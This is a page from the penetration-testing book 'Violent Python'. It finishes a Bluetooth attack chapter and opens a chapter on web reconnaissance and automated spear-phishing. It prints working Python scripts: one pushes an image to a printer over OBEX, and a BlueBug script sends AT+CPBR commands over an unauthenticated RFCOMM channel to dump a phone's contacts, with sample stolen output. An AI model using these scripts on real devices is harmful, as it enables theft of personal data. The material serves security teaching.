Violent Python: A Cookbook for Hackers, Forensic Analysts, Penetration Testers and Security Engineers (26 page)
Authors: TJ O'Connor
Let’s continue our attack against the printer. As it offers OBEX Object Push on RFCOMM Port 2, let’s try to push it an image. We will use obexftp to connect to the printer. Next, we will send it an image file from our attacker workstation called /tmp/ninja.jpg. When the file transfer succeeds, our printer begins printing a nice picture of a ninja for us. This is exciting, but not necessarily dangerous, so we will continue to use this methodology in the next section to carry out more lethal attacks against phones that offer Bluetooth services.
import obexftp
try:
btPrinter = obexftp.client(obexftp.BLUETOOTH)
btPrinter.connect(‘00:16:38:DE:AD:11’, 2)
btPrinter.put_file(‘/tmp/ninja.jpg’)
print ‘[+] Printed Ninja Image.’
except:
print ‘[-] Failed to print Ninja Image.’
From The Trenches
Paris HiltonNot Hacked By Bluetooth
In 2005, Paris Hilton was a lesser-known reality celebrity. However, that all changed when a viral video surfaced on the Internet. The courts later convicted a 17-year-old Massachusetts teenager for hacking Paris Hilton’s T-Mobile Sidekick. After gaining access, the 17-year old stole the contents of Paris’s address book, notepad and photos and published them to the Internet—history knows the rest. The minor served 11 months in a juvenile detention facility for his crimes (
Krebs, 2005
).The attack occurred only two days after the public release of the first Bluetooth worm, known as Cabir.Quick to provide a report, several news agencies falsely reported that the attack occurred over a Bluetooth vulnerability on Paris’s phone. However, the attacker actually used a flaw that allowed him to reset the passwords of Paris’s phone in order to gain access. While the reports proved to be false, they did bring national attention to several lesser-discussed vulnerabilities of the Bluetooth protocol.
In this section, we will replicate a recent attack vector against Bluetooth enabled phones. Originally dubbed a BlueBug attack, this attack uses an unauthenticated and unsecured connection on a phone to steal the details of the phone or issue commands directly to the phone. This attack uses the RFCOMM channel to issue AT commands as a tool to remotely control the device. This allows an attacker to read and write SMS messages, gather personal information, or force dial a 1–900 number.
For example, an attacker could control a Nokia 6310i phone (up to firmware version 5.51) over RFCOMM channel 17. On the previous firmware versions of this phone, the RFCOMM channel 17 required no authentication for a connection. An attacker could simply scan for open RFCOMM channels, find the open RFCOMM 17 channel and then connect and issue an AT command to dump the phonebook.
Let us replicate this attack in Python. Again, we will need to import the Python bindings to the Bluez API. After identifying our target address and vulnerable RFCOMM port, we create a connection to the open, unauthenticated, and unencrypted port. Using this newly created connection, we issue a command such as “AT+CPBR=1” to dump the first contact in the phonebook. Repeating this command for subsequent values steals the entire phonebook.
import bluetooth
tgtPhone = ‘AA:BB:CC:DD:EE:FF’
port = 17
phoneSock = bluetooth.BluetoothSocket(bluetooth.RFCOMM)
phoneSock.connect((tgtPhone, port))
for contact in range(1, 5):
atCmd = ‘AT+CPBR=’ + str(contact) + ‘\n’
phoneSock.send(atCmd)
result = client_sock.recv(1024)
print ‘[+] ‘ + str(contact) + ‘: ‘ + result
sock.close()
Running our attack against a vulnerable phone, we can dump the first five contacts in the phone. Less than fifteen lines of code and we can remotely steal a phonebook over Bluetooth. Outstanding!
attacker# python bluebug.py
[+] 1: +CPBR: 1,”555-1234”,,”Joe Senz”
[+] 2: +CPBR: 2,”555-9999”,,”Jason Brown”
[+] 3: +CPBR: 3,”555-7337”,,”Glen Godwin”
[+] 4: +CPBR: 4,”555-1111”,,”Semion Mogilevich”
[+] 5: +CPBR: 5,”555-8080”,,”Robert Fisher”
Congratulations! We have written quite a few tools in the chapter that we can use to audit our wireless networks and Bluetooth devices. We started by intercepting wireless networks for personal information. Next, we examined how to dissect 802.11 wireless traffic in order to discover preferred networks and find hidden access points. Following that we crash-landed an unmanned aerial vehicle and built a tool to identify wireless hacker toolkits. For the Bluetooth protocol, we built a tool to locate Bluetooth devices, scan them, and exploit a printer and a phone.
Hopefully, you have enjoyed this chapter. I have enjoyed writing it. I cannot say the same for my wife who had to deal with endless pictures of ninjas showing up on her printer, her iPhone battery mysteriously draining, the home access point suddenly becoming hidden, or for my five year old daughter - whose toy UAV kept falling out of the sky as daddy refined his code. In the next chapter, we will examine some ways for doing open source reconnaissance of social media networks using Python.
1. Adams, D. (1980). The hitchhiker’s guide to the galaxy (Perma-Bound ed.). New York: Ballantine Books.
2. Butler, E. (2010, October 24).
Firesheep
. Retrieved from <
http://codebutler.com/firesheep
>.
3. Friedberg, S. (2010, June 3). Source Code Analysis of gstumbler. Retrieved from <
static.googleusercontent.com/external_content/untrusted_dlcp/www.google.com/en/us/googleblogs/pdfs/friedberg_sourcecode_analysis_060910.pdf
>.
4. Albert Gonzalez v. United States of America (2008, August 5).U.S.D.C. District of Massachusetts08-CR-10223.Retrievedfrom <
www.justice.gov/usao/ma/news/IDTheft/Gonzalez,%20Albert%20-%20Indictment%20080508.pdf
>.
5. Herfurt, M. (2004, March 1). Bluesnarfing @ CeBIT 2004—Detecting and attacking bluetooth-enabled cellphones at the Hannover fairground. Retrieved from <
trifinite.org/Downloads/BlueSnarf_CeBIT2004.pdf
>.
6. Krebs, B. (2005, November 13). Teen pleads guilty to hacking Paris Hilton’s phone.
The Washington Post
. Retrieved from <
http://www.washingtonpost.com/wp-dyn/content/article/2005/09/13/AR2005091301423.html
>.
7. McCullagh, D. (2009, December 17). U.S. was warned of predator drone hacking.
CBS News
. Retrieved from <
http://www.cbsnews.com/8301-504383_162-5988978-504383.html
>.
8. Peretti, K. (2009).
Data breaches: What the underground world of carding reveals
. Retrieved from <
www.justice.gov/criminal/cybercrime/DataBreachesArticle.pdf
>.
9. Shane, S. (2009, December 18). Officials say Iraq fighters intercepted drone video.
NYTimes.com
. Retrieved from <
http://www.nytimes.com/2009/12/18/world/middleeast/18drones.html
>.
10. SkyGrabber. (2011).
Official site for programs SkyGrabber
. Retrieved from <
http://www.skygrabber.com/en/index
>.
11. US Secret Service (2007, September 13).
California man arrested on wire fraud, identity theft charges
. Press Release, US Secret Service. Retrieved from <
www.secretservice.gov/press/GPA11-07_PITIndictment.pdf
>.
12. Zetter, K. (2009, June 18). TJX hacker was awash in cash; his penniless coder faces prison.
Wired
. Retrieved from <
www.wired.com/threatlevel/2009/06/watt
>.
Web Recon with Python
Information in this chapter:
Anonymously Browsing the Internet with the Mechanize Class
Mirroring Website Elements in Python Using Beautiful Soup
Interacting with Google Using Python
Interacting with Twitter Using Python
Automated Spear-Phishing
During my eighty-seven years I have witnessed a whole succession of technological revolutions. But none of them has done away with the need for character in the individual or the ability to think.
—Bernard M. Baruch, Presidential Advisor to the 28th and 32nd US Presidents
In 2010, two large-scale cyber attacks changed the nature of how we understand cyber warfare today. We previously discussed Operation Aurora in Chapter 4. During Operation Aurora, hackers targeted multinational businesses “including Yahoo, Symantec, Adobe, Northrop Grumman and Dow Chemical,” as well as several Gmail accounts (
Cha & Nakashima, 2010, p. 2
).
The Washington Post
went on to describe this attack as having “a new level of sophistication” at the time of its discovery and investigation. Stuxnet, the second attack, targeted at SCADA systems, particularly those in Iran (AP, 2010). Network defenders should be concerned about the developments found in Stuxnet, which was “a more mature and technologically advanced (semi-) targeted attack than Aurora” (
Matrosov, Rodionov, Harley & Malcho, 2010
). Despite these two cyber attacks being very sophisticated, they both shared one critical similarity: they spread, at least in part, due to social engineering (
Constantin, 2012
).
No matter how sophisticated or deadly a cyber attack becomes, the presence of effective social engineering will always increase the attack’s effectiveness. In the following chapter, we will examine how we can use Python to automate a social-engineering attack.
Before any operation can be undertaken, an attacker should have detailed knowledge of the target—the more information that an attacker possesses, the greater the chance that the attack will succeed. This concept extends to the world of information warfare as well. In this domain, and in today’s age, most of the information required can be found on the Internet. The likelihood of an important piece of information remaining is high, due to the vast scale of the Internet. To prevent this loss of information, a computer program can be used to automate the entire process. Python is an excellent tool for the automation task because of the large number of third-party libraries that have been written to allow for easy interaction with websites and the Internet.
In this chapter we will go through the process of performing reconnaissance against a target. The key aspects of this process are ensuring that we gather the maximum amount of information possible, while not being detected by the extremely vigilant and capable network administrator at the company headquarters. Finally, we will look at how aggregating data allows for a highly sophisticated and personalized social-engineering attack against this entity. Ensure that before applying any of these techniques against others, you consult with law enforcement officials or legal advice. We have depicted these attacks here to show the tools used in such attacks in order to better understand their approach and understand how to defend against them in our own lives.
